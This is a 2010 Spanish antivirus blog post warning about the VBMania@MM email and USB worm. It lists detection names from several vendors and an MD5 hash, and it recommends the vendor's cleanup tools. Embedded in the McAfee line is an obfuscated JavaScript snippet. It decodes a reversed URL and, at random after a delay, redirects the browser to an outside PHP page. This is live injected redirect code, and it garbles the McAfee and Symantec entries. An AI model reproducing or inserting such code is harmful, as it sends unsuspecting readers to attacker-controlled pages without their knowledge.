Le llamen como le llamen, el nivel de infeccion del VBMANIA @ MM indican que ha sido alarmante
Al inicio del dia 10/09/2010 ya avisamos del nuevo virus que se propagaba por mail masivo de esta forma:
y que cada antivirus le ha llamado como ha querido, por ejemplo:
Kaspersky 7.0.0.125 2010.09.10 Trojan.Win32.Swisyn.algm
McAfee 5.400.0.1158 2010.09.10 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/VBMania@MM”>W32/VBMania@MM
Microsoft 1.6103 2010.09.10 Worm:Win32/Visal.B
NOD32 5438 2010.09.09 probably unknown NewHeur_PE
PCTools 7.0.3.5 2010.09.10 Email-Worm.Imsolk
Sophos 4.57.0 2010.09.10 W32/Autorun-BHO
Sunbelt 6857 2010.09.10 Trojan.Win32.Generic!BT
Symantec 20101.1.1.7 2010.09.10 to, gracias a un aviso de emergencia de McAfee, pero los que no lo leyeron y se hayan infectado, pueden localizar y aislar al gusano con el ELIMD5, entrando esta cadena:
2bde56d8fb2df4438192fb46cd0cc9c9
.
y recuerden que se propaga por pendrive, asi que si no tienen el ordenador y los pendrives protegidos con el ELIPEN… :
Tras probarlos, reiniciar y postearnos el contenido de C:\infosat.txt para ver el resultado del proceso
Y si en el informe leen que POR FAVOR, ENVIARNOS MUESTRAS DE ALGUN FICHERO PARA ANALIZAR, procedan en consecuencia.
saludos
ms, 12-9-2010
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Los comentarios están cerrados.